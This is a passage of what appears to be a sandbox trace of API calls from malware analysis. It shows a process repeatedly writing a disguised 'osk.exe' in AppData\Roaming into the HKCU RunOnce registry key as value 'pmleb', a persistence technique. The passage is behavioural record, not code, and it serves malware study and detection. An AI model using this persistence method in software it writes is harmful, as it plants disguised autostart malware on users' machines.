HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.971] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.971] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0081.971] RegCloseKey (hKey=0x280) returned 0x0 [0081.972] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.972] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.972] SetTimer (hWnd=0x20280, nIDEvent=0x20d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d3 [0081.972] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.983] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.983] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.984] KillTimer (hWnd=0x20280, uIDEvent=0x20d3) returned 1 [0081.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.984] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.984] IUnknown:Release (This=0x787518) returned 0x1 [0081.984] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.984] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.984] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.985] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.985] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 
[0081.985] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.985] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x59 [0081.985] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.986] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0081.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.986] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.986] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.986] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.986] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.986] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.987] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.987] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.987] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.987] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.987] RegCloseKey (hKey=0x280) returned 0x0 [0081.987] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.988] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.988] SetTimer (hWnd=0x20280, nIDEvent=0x20d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d4 [0081.988] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.999] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.999] KillTimer (hWnd=0x20280, uIDEvent=0x20d4) returned 1 [0082.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.000] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.000] IUnknown:Release (This=0x787518) returned 0x1 [0082.000] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.000] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.000] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.000] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.000] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.000] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0082.001] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.001] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5a [0082.001] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.002] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0082.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.002] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.002] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.002] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.002] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.002] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.002] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.002] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.002] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.003] RegCloseKey (hKey=0x280) returned 0x0 [0082.003] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.003] SetTimer (hWnd=0x20280, nIDEvent=0x20d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d5 [0082.003] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.015] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.015] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.015] KillTimer (hWnd=0x20280, uIDEvent=0x20d5) returned 1 [0082.015] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.015] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.015] IUnknown:Release (This=0x787518) returned 0x1 [0082.016] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.016] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.016] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.016] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.016] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.017] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0082.017] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0082.017] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5b [0082.017] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.018] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0082.018] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.018] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.018] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.018] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.018] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
